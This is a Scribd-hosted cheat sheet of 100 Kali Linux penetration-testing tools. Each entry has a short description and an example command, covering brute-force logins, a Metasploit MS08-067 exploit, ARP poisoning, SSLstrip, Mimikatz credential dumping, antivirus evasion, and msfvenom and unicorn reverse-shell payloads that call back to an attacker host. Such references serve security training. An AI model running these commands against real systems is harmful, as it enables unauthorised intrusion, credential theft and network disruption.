100% found this document useful (1 vote)
376 views5 pages

Kali Linux Tools

The document lists various tools available in Kali Linux for penetration testing and security assessments, including their functionalities and example commands. Tools such as Netcat, Hydra, and Metasploit are highlighted for tasks like data transfer, brute force attacks, and exploiting vulnerabilities. The document serves as a comprehensive reference for cybersecurity professionals looking to utilize these tools effectively.

Uploaded by

r.curienodin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
376 views5 pages

Kali Linux Tools

The document lists various tools available in Kali Linux for penetration testing and security assessments, including their functionalities and example commands. Tools such as Netcat, Hydra, and Metasploit are highlighted for tasks like data transfer, brute force attacks, and exploiting vulnerabilities. The document serves as a comprehensive reference for cybersecurity professionals looking to utilize these tools effectively.

Uploaded by

r.curienodin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Kali Linux tools

1. Netcat – Listen on a specific port for incoming connections and transfer data
Example: nc -lvp 4444
2. Hydra – Brute force SSH login for a single username using a wordlist
Example: hydra -l admin -P passwords.txt ssh://192.168.1.100
3. Burpsuite – Intercept and modify HTTP/S traffic during web application testing
Example: Launch Burp and set your browser’s proxy to 127.0.0.1:8080
4. nmap – Scan a target with aggressive options to detect services, versions, and OS details
Example: nmap -A 192.168.1.1
5. John the Ripper – Crack password hashes using dictionary and brute force methods
Example: john --wordlist=passwords.txt hashfile.txt
6. Metasploit – Launch and manage exploits to compromise systems using known vulnerabilities
Example: msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.100; run"
7. Aircrack-ng – Capture wireless packets and crack WEP/WPA handshakes

Example: aircrack-ng -w wordlist.txt capture.cap


8. SQLmap – Automatically detect and exploit SQL injection vulnerabilities to extract DB data
Example: sqlmap -u "http://target.com/page.php?id=1" --dbs
9. Wireshark – Capture and analyze live network packets with detailed protocol dissection
Example: Open Wireshark and start a capture on your desired interface
10. Ettercap – Perform man‑in‑the‑middle attacks via ARP poisoning on local networks
Example: ettercap -T -q -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.100/
11. Nikto – Scan web servers for dangerous files, misconfigurations, and outdated software
Example: nikto -h http://target.com
12. OpenVAS – Conduct comprehensive vulnerability scans across networked systems
Example: Configure a target via the OpenVAS web interface and launch a scan
13. Tcpdump – Capture live packets on a network interface for protocol-level analysis
Example: tcpdump -i eth0 port 80
14. Hashcat – Use GPU acceleration to recover passwords from various hash algorithms
Example: hashcat -m 0 -a 0 hash.txt wordlist.txt
15. Binwalk – Analyze firmware images to extract embedded files and hidden data
Example: binwalk firmware.bin
16. Maltego – Perform link analysis and data mining to map relationships during recon
Example: Launch the Maltego GUI and run entity transforms against a domain
17. Kismet – Detect and capture wireless networks and associated clients passively
Example: Launch Kismet specifying your wireless interface (e.g., kismet -c wlan0)
18. WPScan – Enumerate vulnerabilities and weak configurations in WordPress sites
Example: wpscan --url http://targetsite.com --enumerate u

19. Dirb – Brute force common directories and file paths on a web server

Example: dirb http://targetsite.com


20. GoBuster – Brute force directories or DNS subdomains to uncover hidden paths

Kali Linux tools 1


Example: gobuster dir -u http://targetsite.com -w /path/to/wordlist.txt
21. Ffuf – Fuzz web applications to discover hidden files, directories, or parameters

Example: ffuf -u http://target/FUZZ -w wordlist.txt

22. Netdiscover – Identify live hosts on a LAN via ARP requests


Example: netdiscover -r 192.168.1.0/24

23. SET (Social-Engineer Toolkit) – Craft and launch social engineering attacks like phishing
Example: Run setoolkit and follow interactive menus to build your payload

24. Recon-ng – Automate open‑source intelligence gathering with a modular recon framework
Example: Launch recon-ng and use modules like contacts-host against a domain

25. Wifite – Automate capturing and cracking of WPA/WPA2 handshakes from wireless networks
Example: wifite -i wlan0

26. SQLninja – Exploit SQL injection flaws in Microsoft SQL Server environments
Example: sqlninja -u "http://target/page.php?id=1"

27. LBD (Load Balancer Detector) – Detect load balancers or proxies masking a target’s true IP
Example: lbd -i eth0 192.168.1.100

28. Patator – Perform multi‑protocol brute force attacks with flexible module support
Example: patator ftp_login host=192.168.1.100 user=FILE0 pass=FILE1 0=usernames.txt 1=passwords.txt

29. Tcpflow – Capture and store entire TCP sessions for post-capture analysis
Example: tcpflow -i eth0 port 80

30. Scapy – Create, send, and manipulate custom network packets in Python
Example:

from scapy.all import *


packet = IP(dst=“8.8.8.8”)/ICMP()

response = sr1(packet)
print(response.summary())

```
31. Armitage – Graphical front-end for Metasploit to visualize targets and manage exploits

Example: Launch Armitage and connect it to a running Metasploit RPC server


32. BeEF (Browser Exploitation Framework) – Exploit vulnerabilities in web browsers via client-side attacks

Example: beef-xss to start the BeEF server and load its web interface
33. Cewl – Spider a website to generate a custom wordlist from its content

Example: cewl http://targetsite.com -w wordlist.txt


34. W3af – Scan and exploit web application vulnerabilities with an interactive console

Example: Launch w3af_console and execute a scan profile against a target URL

35. XSSer – Automatically detect and exploit cross-site scripting (XSS) vulnerabilities
Example: xsser --url http://targetsite.com/page.php?param=1

36. Skipfish – Crawl and audit web applications to discover security issues and map site structure
Example: skipfish -o output_folder http://targetsite.com

37. DNSenum – Enumerate DNS records, subdomains, and perform zone transfers on a target domain
Example: dnsenum target.com
38. DNSrecon – Conduct thorough DNS reconnaissance including brute forcing and zone transfers

Example: dnsrecon -d target.com -t brt


39. theHarvester – Collect emails, subdomains, and hostnames from public search engines

Kali Linux tools 2


Example: theHarvester -d target.com -l 100 -b google
40. SSLstrip – Downgrade HTTPS connections to HTTP to intercept sensitive data

Example: sslstrip -l 10000

41. Responder – Poison LLMNR, NBT-NS, and MDNS requests to capture Windows authentication hashes

Example: responder -I eth0


42. Ncrack – Perform high‑speed network authentication cracking against various protocols

Example: ncrack -p 22 -u admin -P passwords.txt 192.168.1.100

43. Medusa – Parallel brute force login tool supporting multiple protocols

Example: medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh


44. SMBMap – Enumerate and assess SMB shares for misconfigurations and sensitive file exposure

Example: smbmap -H 192.168.1.100 -u guest

45. enum4linux – Extract information from Windows and Samba systems through SMB protocols

Example: enum4linux -a 192.168.1.100


46. CrackMapExec – Automate post‑exploitation tasks in Active Directory environments across networks

Example: cme smb 192.168.1.0/24 -u user -p pass

47. Mimikatz – Extract plaintext passwords, hashes, and Kerberos tickets from Windows memory

Example: Run mimikatz.exe on a compromised Windows machine (often via Wine in Kali)
48. Impacket – Utilize Python classes for crafting and executing low‑level network protocols

Example: python3 smbclient.py -target-ip 192.168.1.100

49. PowerSploit – Execute PowerShell scripts to perform post‑exploitation and offensive tasks on Windows

Example: Run a module like Invoke-Shellcode from the PowerSploit suite


50. Veil-Evasion – Generate payloads engineered to bypass antivirus detection

Example: veil-evasion --payload windows/meterpreter/rev_tcp

51. Unicorn – Convert shellcode into VBA macros for bypassing security in Office documents

Example: python unicorn.py windows/meterpreter/rev_https LHOST=192.168.1.100 LPORT=443


52. Arp-scan – Scan local networks by sending ARP requests to discover live hosts

Example: arp-scan -l

53. Wifiphisher – Automate phishing attacks against WiFi networks to capture WPA credentials

Example: wifiphisher -i wlan0

54. Fluxion – Conduct social engineering attacks to harvest WiFi passwords via a fake access point
Example: Run ./fluxion.sh and follow the interactive menus

55. Reaver – Exploit WPS vulnerabilities to retrieve WPA/WPA2 passphrases

Example: reaver -i wlan0 -b [BSSID] -vv

56. Bully – Brute force WPS PINs on wireless networks to compromise WPA/WPA2 security
Example: bully wlan0 -b [BSSID]

57. Pixiewps – Exploit Pixie Dust vulnerability in WPS to recover the WPA/WPA2 passphrase offline

Example: pixiewps -e <EAP data>

58. Fern Wifi Cracker – Graphical tool to audit and crack WiFi network passwords
Example: Launch the Fern Wifi Cracker GUI and select your target

59. Sherlock – Search multiple social networks to find accounts based on a username

Example: sherlock username

60. Sublist3r – Enumerate subdomains by leveraging multiple search engines and DNS queries
Example: sublist3r -d target.com

Kali Linux tools 3


61. Amass – Map out attack surfaces through DNS enumeration and subdomain discovery
Example: amass enum -d target.com

62. Knockpy – Brute force subdomains using dictionary attacks against a target domain

Example: knockpy target.com

63. DNSMap – Map DNS records and discover subdomains to understand a target’s network structure
Example: dnsmap target.com

64. Paros Proxy – Intercept and modify HTTP/S traffic with a dedicated web security proxy

Example: Launch Paros Proxy and configure your browser’s proxy settings

65. ZAP (OWASP Zed Attack Proxy) – Intercept, fuzz, and scan web applications for vulnerabilities
Example: Launch ZAP and use the automated scanner on a target URL

66. Wapiti – Black‑box web vulnerability scanner that maps and tests web application components

Example: wapiti -u http://targetsite.com

67. Arachni – Scan web applications for security issues using a high‑performance Ruby framework
Example: arachni http://targetsite.com --report-save=report.afr

68. Xerosploit – Launch man‑in‑the‑middle attacks and network manipulation for red team exercises

Example: Run xerosploit and choose the desired attack mode from the menu

69. THC-IPv6 – A suite of tools to test and exploit vulnerabilities in IPv6 networks
Example: thc-ipv6 -I eth0

70. 6Scan – Perform IPv6 scanning to discover hosts and services in an IPv6 network

Example: 6scan -6 -p 80 target_ipv6_address

71. EvilGrade – Automate injection of malicious updates in systems with vulnerable update mechanisms

Example: Run evilgrade and configure a module to target a specific service


72. Grendel-Scan – Automate the detection of web application vulnerabilities with a modular scanner

Example: grendel-scan http://targetsite.com

73. Wfuzz – Brute force web application parameters and directories to uncover hidden resources

Example: wfuzz -c -z file,wordlist.txt --hc 404 http://target/FUZZ


74. Commix – Automatically test and exploit command injection vulnerabilities in web apps

Example: commix --url="http://target.com/page.php?param=1"

75. XSStrike – Advanced XSS detection and exploitation tool featuring fuzzing capabilities

Example: python3 xsstrike.py -u http://targetsite.com


76. DotDotPwn – Scan for directory traversal and file disclosure vulnerabilities in web servers

Example: perl dotdotpwn.pl -m file -h target.com

77. Wifijammer – Launch deauthentication attacks against wireless networks to disrupt connectivity

Example: wifijammer -i wlan0 -t target_mac


78. MDK3 – Perform DoS attacks and test wireless network robustness through various modes

Example: mdk3 wlan0 d -t target_mac

79. SMBclient – Access and interact with SMB/CIFS shares directly from the command line

Example: smbclient //192.168.1.100/share -U username


80. Msfvenom – Generate custom payloads for various platforms to use in exploits

Example: msfvenom -p windows/meterpreter/rev_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe


81. Driftnet – Monitor network traffic to extract and display images transmitted over the network

Example: driftnet -i eth0


82. NetSniff-ng – A suite of tools for high‑performance packet capturing and network analysis

Kali Linux tools 4


Example: netsniff-ng -i eth0
83. Smbexec – Execute commands on remote Windows systems via SMB without needing prior access

Example: smbexec.py -target 192.168.1.100 -user user -pass pass


84. EvilAP – Create rogue wireless access points to lure clients into connecting for credential capture
Example: evilap -i wlan0

85. Arpwatch – Monitor ARP traffic to detect changes and possible spoofing on a network
Example: arpwatch -i eth0
86. OWASP Dependency Check – Scan project dependencies to identify publicly disclosed vulnerabilities

Example: dependency-check --project target --scan /path/to/project


87. Radare2 – A reverse engineering framework for analyzing binaries through disassembly and debugging

Example: radare2 -A binaryfile


88. Volatility – Analyze memory dumps for forensic investigation and process listing on compromised systems
Example: volatility -f memory.dump --profile=Win7SP1x64 pslist

89. Sleuth Kit – Forensically analyze file systems and recover deleted files from storage media
Example: fls -r /dev/sda1

90. Autopsy – Graphical interface for forensic investigations to analyze disk images and recover evidence
Example: Launch Autopsy and add the disk image as evidence
91. Fierce – DNS scanner to locate non‑contiguous IP space and enumerate subdomains

Example: fierce -dns target.com


92. SPARTA – GUI‑based network infrastructure scanner that maps out hosts and services
Example: Launch sparta and input your target network range

93. P0f – Passively fingerprint operating systems on a network without sending any packets
Example: p0f -i eth0

94. HTTrack – Download an entire website for offline browsing and analysis
Example: httrack http://targetsite.com
95. DNSChef – Spoof DNS responses to redirect target traffic for testing or analysis

Example: dnschef -i 192.168.1.100 -f hosts.txt


96. SMBrelay – Relay SMB authentication to exploit trust relationships between Windows systems
Example: impacket-smbrelayx -h target.com

97. Pupy – Cross‑platform remote administration tool for post‑exploitation and payload delivery
Example: python pupygen.py -f exe -O windows

98. RouterSploit – Exploitation framework targeting embedded devices like routers and IoT systems
Example: rsf.py (then use interactive commands to scan and exploit)
99. FuzzDB – Repository of attack patterns, payloads, and resources to assist in fuzzing applications

Example: Reference payloads from FuzzDB in your custom fuzzing scripts


100. Metagoofil – Extract metadata from public documents (PDF, DOC, etc.) for reconnaissance
Example: metagoofil -d target.com -t pdf -l 50 -n 10 -o output

Kali Linux tools 5

You might also like